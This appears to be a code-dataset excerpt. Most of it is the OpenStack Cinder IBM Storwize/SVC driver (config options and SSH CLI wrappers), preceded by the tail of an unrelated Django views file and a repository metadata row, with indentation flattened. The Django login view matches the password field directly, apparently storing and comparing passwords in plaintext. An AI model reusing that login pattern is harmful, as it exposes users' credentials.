return HttpResponse(information)
else:
return HttpResponse('errot')
else:
return render(request,'usermas/regins.html')
#return HttpResponse('error')
def login(request):
if request.method=='POST':
form=loginform(request.POST)
if form.is_valid():
print 'rrr'
myuser=user.objects.filter(username__exact=form.cleaned_data['username'],security_id__password__exact=form.cleaned_data['password'])
if myuser:
information='wellcome '+form.cleaned_data['username']
return HttpResponse(information)
else:
information='password or username error'
return render(request,'usermas/login.html',{'information':information})
else:
print'ssss'
information='fei fa'
return render(request,'usermas/login.html',{'information':information})
else:
return render(request,'usermas/login.html')
# Create your views here.
| [
"[email protected]"
]
| |
75e67f9d2f99485e02e71e9d13c80edfe59d577a | 42c63d5f9c724c99ba93f77bdead51891fcf8623 | /OpenStack-Mitaka-src/cinder/cinder/volume/drivers/ibm/storwize_svc/storwize_svc_common.py | f5e43d96d19eda583d719b33f56058a3e20c740f | [
"Apache-2.0"
]
| permissive | liyongle/openstack-mitaka | 115ae819d42ed9bf0922a8c0ab584fa99a3daf92 | 5ccd31c6c3b9aa68b9db1bdafcf1b029e8e37b33 | refs/heads/master | 2021-07-13T04:57:53.488114 | 2019-03-07T13:26:25 | 2019-03-07T13:26:25 | 174,311,782 | 0 | 1 | null | 2020-07-24T01:44:47 | 2019-03-07T09:18:55 | Python | UTF-8 | Python | false | false | 139,105 | py | # Copyright 2015 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import math
import paramiko
import random
import re
import string
import time
import unicodedata
from eventlet import greenthread
from oslo_concurrency import processutils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_service import loopingcall
from oslo_utils import excutils
from oslo_utils import strutils
from oslo_utils import units
import six
from cinder import context
from cinder import exception
from cinder import ssh_utils
from cinder import utils as cinder_utils
from cinder.i18n import _, _LE, _LI, _LW
from cinder.objects import fields
from cinder.volume import driver
from cinder.volume.drivers.ibm.storwize_svc import (
replication as storwize_rep)
from cinder.volume.drivers.san import san
from cinder.volume import qos_specs
from cinder.volume import utils
from cinder.volume import volume_types
INTERVAL_1_SEC = 1
DEFAULT_TIMEOUT = 15
LOG = logging.getLogger(__name__)
storwize_svc_opts = [
cfg.ListOpt('storwize_svc_volpool_name',
default=['volpool'],
help='Comma separated list of storage system storage '
'pools for volumes.'),
cfg.IntOpt('storwize_svc_vol_rsize',
default=2,
min=-1, max=100,
help='Storage system space-efficiency parameter for volumes '
'(percentage)'),
cfg.IntOpt('storwize_svc_vol_warning',
default=0,
min=-1, max=100,
help='Storage system threshold for volume capacity warnings '
'(percentage)'),
cfg.BoolOpt('storwize_svc_vol_autoexpand',
default=True,
help='Storage system autoexpand parameter for volumes '
'(True/False)'),
cfg.IntOpt('storwize_svc_vol_grainsize',
default=256,
help='Storage system grain size parameter for volumes '
'(32/64/128/256)'),
cfg.BoolOpt('storwize_svc_vol_compression',
default=False,
help='Storage system compression option for volumes'),
cfg.BoolOpt('storwize_svc_vol_easytier',
default=True,
help='Enable Easy Tier for volumes'),
cfg.IntOpt('storwize_svc_vol_iogrp',
default=0,
help='The I/O group in which to allocate volumes'),
cfg.IntOpt('storwize_svc_flashcopy_timeout',
default=120,
min=1, max=600,
help='Maximum number of seconds to wait for FlashCopy to be '
'prepared.'),
cfg.BoolOpt('storwize_svc_multihostmap_enabled',
default=True,
help='This option no longer has any affect. It is deprecated '
'and will be removed in the next release.',
deprecated_for_removal=True),
cfg.BoolOpt('storwize_svc_allow_tenant_qos',
default=False,
help='Allow tenants to specify QOS on create'),
cfg.StrOpt('storwize_svc_stretched_cluster_partner',
default=None,
help='If operating in stretched cluster mode, specify the '
'name of the pool in which mirrored copies are stored.'
'Example: "pool2"'),
cfg.StrOpt('storwize_san_secondary_ip',
default=None,
help='Specifies secondary management IP or hostname to be '
'used if san_ip is invalid or becomes inaccessible.'),
cfg.BoolOpt('storwize_svc_vol_nofmtdisk',
default=False,
help='Specifies that the volume not be formatted during '
'creation.'),
cfg.IntOpt('storwize_svc_flashcopy_rate',
default=50,
min=1, max=100,
help='Specifies the Storwize FlashCopy copy rate to be used '
'when creating a full volume copy. The default is rate '
'is 50, and the valid rates are 1-100.'),
]
CONF = cfg.CONF
CONF.register_opts(storwize_svc_opts)
class StorwizeSSH(object):
"""SSH interface to IBM Storwize family and SVC storage systems."""
def __init__(self, run_ssh):
self._ssh = run_ssh
def _run_ssh(self, ssh_cmd):
try:
return self._ssh(ssh_cmd)
except processutils.ProcessExecutionError as e:
msg = (_('CLI Exception output:\n command: %(cmd)s\n '
'stdout: %(out)s\n stderr: %(err)s.') %
{'cmd': ssh_cmd,
'out': e.stdout,
'err': e.stderr})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
def run_ssh_info(self, ssh_cmd, delim='!', with_header=False):
"""Run an SSH command and return parsed output."""
raw = self._run_ssh(ssh_cmd)
return CLIResponse(raw, ssh_cmd=ssh_cmd, delim=delim,
with_header=with_header)
def run_ssh_assert_no_output(self, ssh_cmd):
"""Run an SSH command and assert no output returned."""
out, err = self._run_ssh(ssh_cmd)
if len(out.strip()) != 0:
msg = (_('Expected no output from CLI command %(cmd)s, '
'got %(out)s.') % {'cmd': ' '.join(ssh_cmd), 'out': out})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
def run_ssh_check_created(self, ssh_cmd):
"""Run an SSH command and return the ID of the created object."""
out, err = self._run_ssh(ssh_cmd)
try:
match_obj = re.search(r'\[([0-9]+)\],? successfully created', out)
return match_obj.group(1)
except (AttributeError, IndexError):
msg = (_('Failed to parse CLI output:\n command: %(cmd)s\n '
'stdout: %(out)s\n stderr: %(err)s.') %
{'cmd': ssh_cmd,
'out': out,
'err': err})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
def lsnode(self, node_id=None):
with_header = True
ssh_cmd = ['svcinfo', 'lsnode', '-delim', '!']
if node_id:
with_header = False
ssh_cmd.append(node_id)
return self.run_ssh_info(ssh_cmd, with_header=with_header)
def lslicense(self):
ssh_cmd = ['svcinfo', 'lslicense', '-delim', '!']
return self.run_ssh_info(ssh_cmd)[0]
def lsguicapabilities(self):
ssh_cmd = ['svcinfo', 'lsguicapabilities', '-delim', '!']
return self.run_ssh_info(ssh_cmd)[0]
def lssystem(self):
ssh_cmd = ['svcinfo', 'lssystem', '-delim', '!']
return self.run_ssh_info(ssh_cmd)[0]
def lsmdiskgrp(self, pool):
ssh_cmd = ['svcinfo', 'lsmdiskgrp', '-bytes', '-delim', '!',
'"%s"' % pool]
return self.run_ssh_info(ssh_cmd)[0]
def lsiogrp(self):
ssh_cmd = ['svcinfo', 'lsiogrp', '-delim', '!']
return self.run_ssh_info(ssh_cmd, with_header=True)
def lsportip(self):
ssh_cmd = ['svcinfo', 'lsportip', '-delim', '!']
return self.run_ssh_info(ssh_cmd, with_header=True)
@staticmethod
def _create_port_arg(port_type, port_name):
if port_type == 'initiator':
port = ['-iscsiname']
else:
port = ['-hbawwpn']
port.append(port_name)
return port
def mkhost(self, host_name, port_type, port_name):
port = self._create_port_arg(port_type, port_name)
ssh_cmd = ['svctask', 'mkhost', '-force'] + port
ssh_cmd += ['-name', '"%s"' % host_name]
return self.run_ssh_check_created(ssh_cmd)
def addhostport(self, host, port_type, port_name):
port = self._create_port_arg(port_type, port_name)
ssh_cmd = ['svctask', 'addhostport', '-force'] + port + ['"%s"' % host]
self.run_ssh_assert_no_output(ssh_cmd)
def lshost(self, host=None):
with_header = True
ssh_cmd = ['svcinfo', 'lshost', '-delim', '!']
if host:
with_header = False
ssh_cmd.append('"%s"' % host)
return self.run_ssh_info(ssh_cmd, with_header=with_header)
def add_chap_secret(self, secret, host):
ssh_cmd = ['svctask', 'chhost', '-chapsecret', secret, '"%s"' % host]
self.run_ssh_assert_no_output(ssh_cmd)
def lsiscsiauth(self):
ssh_cmd = ['svcinfo', 'lsiscsiauth', '-delim', '!']
return self.run_ssh_info(ssh_cmd, with_header=True)
def lsfabric(self, wwpn=None, host=None):
ssh_cmd = ['svcinfo', 'lsfabric', '-delim', '!']
if wwpn:
ssh_cmd.extend(['-wwpn', wwpn])
elif host:
ssh_cmd.extend(['-host', '"%s"' % host])
else:
msg = (_('Must pass wwpn or host to lsfabric.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
return self.run_ssh_info(ssh_cmd, with_header=True)
def mkvdiskhostmap(self, host, vdisk, lun, multihostmap):
"""Map vdisk to host.
If vdisk already mapped and multihostmap is True, use the force flag.
"""
ssh_cmd = ['svctask', 'mkvdiskhostmap', '-host', '"%s"' % host,
'-scsi', lun, vdisk]
if multihostmap:
ssh_cmd.insert(ssh_cmd.index('mkvdiskhostmap') + 1, '-force')
try:
self.run_ssh_check_created(ssh_cmd)
except Exception as ex:
if (not multihostmap and hasattr(ex, 'message') and
'CMMVC6071E' in ex.message):
LOG.error(_LE('storwize_svc_multihostmap_enabled is set '
'to False, not allowing multi host mapping.'))
raise exception.VolumeDriverException(
message=_('CMMVC6071E The VDisk-to-host mapping was not '
'created because the VDisk is already mapped '
'to a host.\n"'))
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error mapping VDisk-to-host'))
def mkrcrelationship(self, master, aux, system, name, asyncmirror):
ssh_cmd = ['svctask', 'mkrcrelationship', '-master', master,
'-aux', aux, '-cluster', system, '-name', name]
if asyncmirror:
ssh_cmd.append('-global')
return self.run_ssh_check_created(ssh_cmd)
def rmrcrelationship(self, relationship):
ssh_cmd = ['svctask', 'rmrcrelationship', relationship]
self.run_ssh_assert_no_output(ssh_cmd)
def switchrelationship(self, relationship, aux=True):
primary = 'aux' if aux else 'master'
ssh_cmd = ['svctask', 'switchrcrelationship', '-primary',
primary, relationship]
self.run_ssh_assert_no_output(ssh_cmd)
def startrcrelationship(self, rc_rel, primary=None):
ssh_cmd = ['svctask', 'startrcrelationship', '-force']
if primary:
ssh_cmd.extend(['-primary', primary])
ssh_cmd.append(rc_rel)
self.run_ssh_assert_no_output(ssh_cmd)
def stoprcrelationship(self, relationship, access=False):
ssh_cmd = ['svctask', 'stoprcrelationship']
if access:
ssh_cmd.append('-access')
ssh_cmd.append(relationship)
self.run_ssh_assert_no_output(ssh_cmd)
def lsrcrelationship(self, volume_name):
key_value = 'name=%s' % volume_name
ssh_cmd = ['svcinfo', 'lsrcrelationship', '-filtervalue',
key_value, '-delim', '!']
return self.run_ssh_info(ssh_cmd, with_header=True)
def lspartnership(self, system_name):
key_value = 'name=%s' % system_name
ssh_cmd = ['svcinfo', 'lspartnership', '-filtervalue',
key_value, '-delim', '!']
return self.run_ssh_info(ssh_cmd, with_header=True)
def lspartnershipcandidate(self):
ssh_cmd = ['svcinfo', 'lspartnershipcandidate', '-delim', '!']
return self.run_ssh_info(ssh_cmd, with_header=True)
def mkippartnership(self, ip_v4, bandwith):
ssh_cmd = ['svctask', 'mkippartnership', '-type', 'ipv4',
'-clusterip', ip_v4, '-linkbandwidthmbits',
six.text_type(bandwith)]
return self.run_ssh_assert_no_output(ssh_cmd)
def mkfcpartnership(self, system_name, bandwith):
ssh_cmd = ['svctask', 'mkfcpartnership', '-linkbandwidthmbits',
six.text_type(bandwith), system_name]
return self.run_ssh_assert_no_output(ssh_cmd)
def startpartnership(self, partnership_id):
ssh_cmd = ['svctask', 'chpartnership', '-start', partnership_id]
return self.run_ssh_assert_no_output(ssh_cmd)
def rmvdiskhostmap(self, host, vdisk):
ssh_cmd = ['svctask', 'rmvdiskhostmap', '-host', '"%s"' % host, vdisk]
self.run_ssh_assert_no_output(ssh_cmd)
def lsvdiskhostmap(self, vdisk):
ssh_cmd = ['svcinfo', 'lsvdiskhostmap', '-delim', '!', vdisk]
return self.run_ssh_info(ssh_cmd, with_header=True)
def lshostvdiskmap(self, host):
ssh_cmd = ['svcinfo', 'lshostvdiskmap', '-delim', '!', '"%s"' % host]
return self.run_ssh_info(ssh_cmd, with_header=True)
def rmhost(self, host):
ssh_cmd = ['svctask', 'rmhost', '"%s"' % host]
self.run_ssh_assert_no_output(ssh_cmd)
def mkvdisk(self, name, size, units, pool, opts, params):
ssh_cmd = ['svctask', 'mkvdisk', '-name', name, '-mdiskgrp',
'"%s"' % pool, '-iogrp', six.text_type(opts['iogrp']),
'-size', size, '-unit', units] + params
return self.run_ssh_check_created(ssh_cmd)
def rmvdisk(self, vdisk, force=True):
ssh_cmd = ['svctask', 'rmvdisk']
if force:
ssh_cmd += ['-force']
ssh_cmd += [vdisk]
self.run_ssh_assert_no_output(ssh_cmd)
def lsvdisk(self, vdisk):
"""Return vdisk attributes or None if it doesn't exist."""
ssh_cmd = ['svcinfo', 'lsvdisk', '-bytes', '-delim', '!', vdisk]
out, err = self._ssh(ssh_cmd, check_exit_code=False)
if not len(err):
return CLIResponse((out, err), ssh_cmd=ssh_cmd, delim='!',
with_header=False)[0]
if err.startswith('CMMVC5754E'):
return None
msg = (_('CLI Exception output:\n command: %(cmd)s\n '
'stdout: %(out)s\n stderr: %(err)s.') %
{'cmd': ssh_cmd,
'out': out,
'err': err})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
def lsvdisks_from_filter(self, filter_name, value):
"""Performs an lsvdisk command, filtering the results as specified.
Returns an iterable for all matching vdisks.
"""
ssh_cmd = ['svcinfo', 'lsvdisk', '-bytes', '-delim', '!',
'-filtervalue', '%s=%s' % (filter_name, value)]
return self.run_ssh_info(ssh_cmd, with_header=True)
def chvdisk(self, vdisk, params):
ssh_cmd = ['svctask', 'chvdisk'] + params + [vdisk]
self.run_ssh_assert_no_output(ssh_cmd)
def movevdisk(self, vdisk, iogrp):
ssh_cmd = ['svctask', 'movevdisk', '-iogrp', iogrp, vdisk]
self.run_ssh_assert_no_output(ssh_cmd)
def expandvdisksize(self, vdisk, amount):
ssh_cmd = (
['svctask', 'expandvdisksize', '-size', six.text_type(amount),
'-unit', 'gb', vdisk])
self.run_ssh_assert_no_output(ssh_cmd)
def mkfcmap(self, source, target, full_copy, copy_rate, consistgrp=None):
ssh_cmd = ['svctask', 'mkfcmap', '-source', source, '-target',
target, '-autodelete']
if not full_copy:
ssh_cmd.extend(['-copyrate', '0'])
else:
ssh_cmd.extend(['-copyrate', six.text_type(copy_rate)])
if consistgrp:
ssh_cmd.extend(['-consistgrp', consistgrp])
out, err = self._ssh(ssh_cmd, check_exit_code=False)
if 'successfully created' not in out:
msg = (_('CLI Exception output:\n command: %(cmd)s\n '
'stdout: %(out)s\n stderr: %(err)s.') %
{'cmd': ssh_cmd,
'out': out,
'err': err})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
try:
match_obj = re.search(r'FlashCopy Mapping, id \[([0-9]+)\], '
'successfully created', out)
fc_map_id = match_obj.group(1)
except (AttributeError, IndexError):
msg = (_('Failed to parse CLI output:\n command: %(cmd)s\n '
'stdout: %(out)s\n stderr: %(err)s.') %
{'cmd': ssh_cmd,
'out': out,
'err': err})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
return fc_map_id
def prestartfcmap(self, fc_map_id):
ssh_cmd = ['svctask', 'prestartfcmap', fc_map_id]
self.run_ssh_assert_no_output(ssh_cmd)
def startfcmap(self, fc_map_id):
ssh_cmd = ['svctask', 'startfcmap', fc_map_id]
self.run_ssh_assert_no_output(ssh_cmd)
def prestartfcconsistgrp(self, fc_consist_group):
ssh_cmd = ['svctask', 'prestartfcconsistgrp', fc_consist_group]
self.run_ssh_assert_no_output(ssh_cmd)
def startfcconsistgrp(self, fc_consist_group):
ssh_cmd = ['svctask', 'startfcconsistgrp', fc_consist_group]
self.run_ssh_assert_no_output(ssh_cmd)
def stopfcconsistgrp(self, fc_consist_group):
ssh_cmd = ['svctask', 'stopfcconsistgrp', fc_consist_group]
self.run_ssh_assert_no_output(ssh_cmd)
def chfcmap(self, fc_map_id, copyrate='50', autodel='on'):
ssh_cmd = ['svctask', 'chfcmap', '-copyrate', copyrate,
'-autodelete', autodel, fc_map_id]
self.run_ssh_assert_no_output(ssh_cmd)
def stopfcmap(self, fc_map_id):
ssh_cmd = ['svctask', 'stopfcmap', fc_map_id]
self.run_ssh_assert_no_output(ssh_cmd)
def rmfcmap(self, fc_map_id):
ssh_cmd = ['svctask', 'rmfcmap', '-force', fc_map_id]
self.run_ssh_assert_no_output(ssh_cmd)
def lsvdiskfcmappings(self, vdisk):
ssh_cmd = ['svcinfo', 'lsvdiskfcmappings', '-delim', '!', vdisk]
return self.run_ssh_info(ssh_cmd, with_header=True)
def lsfcmap(self, fc_map_id):
ssh_cmd = ['svcinfo', 'lsfcmap', '-filtervalue',
'id=%s' % fc_map_id, '-delim', '!']
return self.run_ssh_info(ssh_cmd, with_header=True)
def lsfcconsistgrp(self, fc_consistgrp):
ssh_cmd = ['svcinfo', 'lsfcconsistgrp', '-delim', '!', fc_consistgrp]
out, err = self._ssh(ssh_cmd)
return CLIResponse((out, err), ssh_cmd=ssh_cmd, delim='!',
with_header=False)
def mkfcconsistgrp(self, fc_consist_group):
ssh_cmd = ['svctask', 'mkfcconsistgrp', '-name', fc_consist_group]
return self.run_ssh_check_created(ssh_cmd)
def rmfcconsistgrp(self, fc_consist_group):
ssh_cmd = ['svctask', 'rmfcconsistgrp', '-force', fc_consist_group]
return self.run_ssh_assert_no_output(ssh_cmd)
def addvdiskcopy(self, vdisk, dest_pool, params):
ssh_cmd = (['svctask', 'addvdiskcopy'] + params + ['-mdiskgrp',
'"%s"' % dest_pool, vdisk])
return self.run_ssh_check_created(ssh_cmd)
def lsvdiskcopy(self, vdisk, copy_id=None):
ssh_cmd = ['svcinfo', 'lsvdiskcopy', '-delim', '!']
with_header = True
if copy_id:
ssh_cmd += ['-copy', copy_id]
with_header = False
ssh_cmd += [vdisk]
return self.run_ssh_info(ssh_cmd, with_header=with_header)
def lsvdisksyncprogress(self, vdisk, copy_id):
ssh_cmd = ['svcinfo', 'lsvdisksyncprogress', '-delim', '!',
'-copy', copy_id, vdisk]
return self.run_ssh_info(ssh_cmd, with_header=True)[0]
def rmvdiskcopy(self, vdisk, copy_id):
ssh_cmd = ['svctask', 'rmvdiskcopy', '-copy', copy_id, vdisk]
self.run_ssh_assert_no_output(ssh_cmd)
def addvdiskaccess(self, vdisk, iogrp):
ssh_cmd = ['svctask', 'addvdiskaccess', '-iogrp', iogrp, vdisk]
self.run_ssh_assert_no_output(ssh_cmd)
def rmvdiskaccess(self, vdisk, iogrp):
ssh_cmd = ['svctask', 'rmvdiskaccess', '-iogrp', iogrp, vdisk]
self.run_ssh_assert_no_output(ssh_cmd)
def lsportfc(self, node_id):
ssh_cmd = ['svcinfo', 'lsportfc', '-delim', '!',
'-filtervalue', 'node_id=%s' % node_id]
return self.run_ssh_info(ssh_cmd, with_header=True)
class StorwizeHelpers(object):
# All the supported QoS key are saved in this dict. When a new
# key is going to add, three values MUST be set:
# 'default': to indicate the value, when the parameter is disabled.
# 'param': to indicate the corresponding parameter in the command.
# 'type': to indicate the type of this value.
svc_qos_keys = {'IOThrottling': {'default': '0',
'param': 'rate',
'type': int}}
def __init__(self, run_ssh):
self.ssh = StorwizeSSH(run_ssh)
self.check_fcmapping_interval = 3
@staticmethod
def handle_keyerror(cmd, out):
msg = (_('Could not find key in output of command %(cmd)s: %(out)s.')
% {'out': out, 'cmd': cmd})
raise exception.VolumeBackendAPIException(data=msg)
def compression_enabled(self):
"""Return whether or not compression is enabled for this system."""
resp = self.ssh.lslicense()
keys = ['license_compression_enclosures',
'license_compression_capacity']
for key in keys:
if resp.get(key, '0') != '0':
return True
# lslicense is not used for V9000 compression check
# compression_enclosures and compression_capacity are
# always 0. V9000 uses license_scheme 9846 as an
# indicator and can always do compression
try:
resp = self.ssh.lsguicapabilities()
if resp.get('license_scheme', '0') == '9846':
return True
except exception.VolumeBackendAPIException as war:
LOG.warning(_LW("Failed to run lsguicapability. "
"Exception: %s."), war)
return False
def get_system_info(self):
"""Return system's name, ID, and code level."""
resp = self.ssh.lssystem()
level = resp['code_level']
match_obj = re.search('([0-9].){3}[0-9]', level)
if match_obj is None:
msg = _('Failed to get code level (%s).') % level
raise exception.VolumeBackendAPIException(data=msg)
code_level = match_obj.group().split('.')
return {'code_level': tuple([int(x) for x in code_level]),
'system_name': resp['name'],
'system_id': resp['id']}
def get_pool_attrs(self, pool):
"""Return attributes for the specified pool."""
return self.ssh.lsmdiskgrp(pool)
def get_available_io_groups(self):
"""Return list of available IO groups."""
iogrps = []
resp = self.ssh.lsiogrp()
for iogrp in resp:
try:
if int(iogrp['node_count']) > 0:
iogrps.append(int(iogrp['id']))
except KeyError:
self.handle_keyerror('lsiogrp', iogrp)
except ValueError:
msg = (_('Expected integer for node_count, '
'svcinfo lsiogrp returned: %(node)s.') %
{'node': iogrp['node_count']})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
return iogrps
def get_volume_io_group(self, vol_name):
vdisk = self.ssh.lsvdisk(vol_name)
if vdisk:
resp = self.ssh.lsiogrp()
for iogrp in resp:
if iogrp['name'] == vdisk['IO_group_name']:
return int(iogrp['id'])
return None
def get_node_info(self):
"""Return dictionary containing information on system's nodes."""
nodes = {}
resp = self.ssh.lsnode()
for node_data in resp:
try:
if node_data['status'] != 'online':
continue
node = {}
node['id'] = node_data['id']
node['name'] = node_data['name']
node['IO_group'] = node_data['IO_group_id']
node['iscsi_name'] = node_data['iscsi_name']
node['WWNN'] = node_data['WWNN']
node['status'] = node_data['status']
node['WWPN'] = []
node['ipv4'] = []
node['ipv6'] = []
node['enabled_protocols'] = []
nodes[node['id']] = node
except KeyError:
self.handle_keyerror('lsnode', node_data)
return nodes
def add_iscsi_ip_addrs(self, storage_nodes):
"""Add iSCSI IP addresses to system node information."""
resp = self.ssh.lsportip()
for ip_data in resp:
try:
state = ip_data['state']
if ip_data['node_id'] in storage_nodes and (
state == 'configured' or state == 'online'):
node = storage_nodes[ip_data['node_id']]
if len(ip_data['IP_address']):
node['ipv4'].append(ip_data['IP_address'])
if len(ip_data['IP_address_6']):
node['ipv6'].append(ip_data['IP_address_6'])
except KeyError:
self.handle_keyerror('lsportip', ip_data)
def add_fc_wwpns(self, storage_nodes):
"""Add FC WWPNs to system node information."""
for key in storage_nodes:
node = storage_nodes[key]
wwpns = set(node['WWPN'])
resp = self.ssh.lsportfc(node_id=node['id'])
for port_info in resp:
if (port_info['type'] == 'fc' and
port_info['status'] == 'active'):
wwpns.add(port_info['WWPN'])
node['WWPN'] = list(wwpns)
LOG.info(_LI('WWPN on node %(node)s: %(wwpn)s.'),
{'node': node['id'], 'wwpn': node['WWPN']})
def add_chap_secret_to_host(self, host_name):
"""Generate and store a randomly-generated CHAP secret for the host."""
chap_secret = utils.generate_password()
self.ssh.add_chap_secret(chap_secret, host_name)
return chap_secret
def get_chap_secret_for_host(self, host_name):
"""Generate and store a randomly-generated CHAP secret for the host."""
resp = self.ssh.lsiscsiauth()
host_found = False
for host_data in resp:
try:
if host_data['name'] == host_name:
host_found = True
if host_data['iscsi_auth_method'] == 'chap':
return host_data['iscsi_chap_secret']
except KeyError:
self.handle_keyerror('lsiscsiauth', host_data)
if not host_found:
msg = _('Failed to find host %s.') % host_name
raise exception.VolumeBackendAPIException(data=msg)
return None
def get_conn_fc_wwpns(self, host):
wwpns = set()
resp = self.ssh.lsfabric(host=host)
for wwpn in resp.select('local_wwpn'):
if wwpn is not None:
wwpns.add(wwpn)
return list(wwpns)
def get_host_from_connector(self, connector):
"""Return the Storwize host described by the connector."""
LOG.debug('Enter: get_host_from_connector: %s.', connector)
# If we have FC information, we have a faster lookup option
host_name = None
if 'wwpns' in connector:
for wwpn in connector['wwpns']:
resp = self.ssh.lsfabric(wwpn=wwpn)
for wwpn_info in resp:
try:
if (wwpn_info['remote_wwpn'] and
wwpn_info['name'] and
wwpn_info['remote_wwpn'].lower() ==
wwpn.lower()):
host_name = wwpn_info['name']
except KeyError:
self.handle_keyerror('lsfabric', wwpn_info)
if host_name:
LOG.debug('Leave: get_host_from_connector: host %s.', host_name)
return host_name
# That didn't work, so try exhaustive search
hosts_info = self.ssh.lshost()
found = False
for name in hosts_info.select('name'):
resp = self.ssh.lshost(host=name)
if 'initiator' in connector:
for iscsi in resp.select('iscsi_name'):
if iscsi == connector['initiator']:
host_name = name
found = True
break
elif 'wwpns' in connector and len(connector['wwpns']):
connector_wwpns = [str(x).lower() for x in connector['wwpns']]
for wwpn in resp.select('WWPN'):
if wwpn and wwpn.lower() in connector_wwpns:
host_name = name
found = True
break
if found:
break
LOG.debug('Leave: get_host_from_connector: host %s.', host_name)
return host_name
def create_host(self, connector):
"""Create a new host on the storage system.
We create a host name and associate it with the given connection
information. The host name will be a cleaned up version of the given
host name (at most 55 characters), plus a random 8-character suffix to
avoid collisions. The total length should be at most 63 characters.
"""
LOG.debug('Enter: create_host: host %s.', connector['host'])
# Before we start, make sure host name is a string and that we have at
# least one port.
host_name = connector['host']
if not isinstance(host_name, six.string_types):
msg = _('create_host: Host name is not unicode or string.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
ports = []
if 'initiator' in connector:
ports.append(['initiator', '%s' % connector['initiator']])
if 'wwpns' in connector:
for wwpn in connector['wwpns']:
ports.append(['wwpn', '%s' % wwpn])
if not len(ports):
msg = _('create_host: No initiators or wwpns supplied.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
# Build a host name for the Storwize host - first clean up the name
if isinstance(host_name, six.text_type):
host_name = unicodedata.normalize('NFKD', host_name).encode(
'ascii', 'replace').decode('ascii')
for num in range(0, 128):
ch = str(chr(num))
if not ch.isalnum() and ch not in [' ', '.', '-', '_']:
host_name = host_name.replace(ch, '-')
# Storwize doesn't like hostname that doesn't starts with letter or _.
if not re.match('^[A-Za-z]', host_name):
host_name = '_' + host_name
# Add a random 8-character suffix to avoid collisions
rand_id = str(random.randint(0, 99999999)).zfill(8)
host_name = '%s-%s' % (host_name[:55], rand_id)
# Create a host with one port
port = ports.pop(0)
self.ssh.mkhost(host_name, port[0], port[1])
# Add any additional ports to the host
for port in ports:
self.ssh.addhostport(host_name, port[0], port[1])
LOG.debug('Leave: create_host: host %(host)s - %(host_name)s.',
{'host': connector['host'], 'host_name': host_name})
return host_name
def delete_host(self, host_name):
self.ssh.rmhost(host_name)
def map_vol_to_host(self, volume_name, host_name, multihostmap):
"""Create a mapping between a volume to a host."""
LOG.debug('Enter: map_vol_to_host: volume %(volume_name)s to '
'host %(host_name)s.',
{'volume_name': volume_name, 'host_name': host_name})
# Check if this volume is already mapped to this host
mapped = False
luns_used = []
result_lun = '-1'
resp = self.ssh.lshostvdiskmap(host_name)
for mapping_info in resp:
luns_used.append(int(mapping_info['SCSI_id']))
if mapping_info['vdisk_name'] == volume_name:
mapped = True
result_lun = mapping_info['SCSI_id']
if not mapped:
# Find unused lun
luns_used.sort()
result_lun = str(len(luns_used))
for index, n in enumerate(luns_used):
if n > index:
result_lun = str(index)
break
self.ssh.mkvdiskhostmap(host_name, volume_name, result_lun,
multihostmap)
LOG.debug('Leave: map_vol_to_host: LUN %(result_lun)s, volume '
'%(volume_name)s, host %(host_name)s.',
{'result_lun': result_lun,
'volume_name': volume_name,
'host_name': host_name})
return int(result_lun)
def unmap_vol_from_host(self, volume_name, host_name):
"""Unmap the volume and delete the host if it has no more mappings."""
LOG.debug('Enter: unmap_vol_from_host: volume %(volume_name)s from '
'host %(host_name)s.',
{'volume_name': volume_name, 'host_name': host_name})
# Check if the mapping exists
resp = self.ssh.lsvdiskhostmap(volume_name)
if not len(resp):
LOG.warning(_LW('unmap_vol_from_host: No mapping of volume '
'%(vol_name)s to any host found.'),
{'vol_name': volume_name})
return
if host_name is None:
if len(resp) > 1:
LOG.warning(_LW('unmap_vol_from_host: Multiple mappings of '
'volume %(vol_name)s found, no host '
'specified.'), {'vol_name': volume_name})
return
else:
host_name = resp[0]['host_name']
else:
found = False
for h in resp.select('host_name'):
if h == host_name:
found = True
if not found:
LOG.warning(_LW('unmap_vol_from_host: No mapping of volume '
'%(vol_name)s to host %(host)s found.'),
{'vol_name': volume_name, 'host': host_name})
# We now know that the mapping exists
self.ssh.rmvdiskhostmap(host_name, volume_name)
LOG.debug('Leave: unmap_vol_from_host: volume %(volume_name)s from '
'host %(host_name)s.',
{'volume_name': volume_name, 'host_name': host_name})
return host_name
def check_host_mapped_vols(self, host_name):
return self.ssh.lshostvdiskmap(host_name)
@staticmethod
def build_default_opts(config):
# Ignore capitalization
cluster_partner = config.storwize_svc_stretched_cluster_partner
opt = {'rsize': config.storwize_svc_vol_rsize,
'warning': config.storwize_svc_vol_warning,
'autoexpand': config.storwize_svc_vol_autoexpand,
'grainsize': config.storwize_svc_vol_grainsize,
'compression': config.storwize_svc_vol_compression,
'easytier': config.storwize_svc_vol_easytier,
'iogrp': config.storwize_svc_vol_iogrp,
'qos': None,
'stretched_cluster': cluster_partner,
'replication': False,
'nofmtdisk': config.storwize_svc_vol_nofmtdisk}
return opt
@staticmethod
def check_vdisk_opts(state, opts):
# Check that grainsize is 32/64/128/256
if opts['grainsize'] not in [32, 64, 128, 256]:
raise exception.InvalidInput(
reason=_('Illegal value specified for '
'storwize_svc_vol_grainsize: set to either '
'32, 64, 128, or 256.'))
# Check that compression is supported
if opts['compression'] and not state['compression_enabled']:
raise exception.InvalidInput(
reason=_('System does not support compression.'))
# Check that rsize is set if compression is set
if opts['compression'] and opts['rsize'] == -1:
raise exception.InvalidInput(
reason=_('If compression is set to True, rsize must '
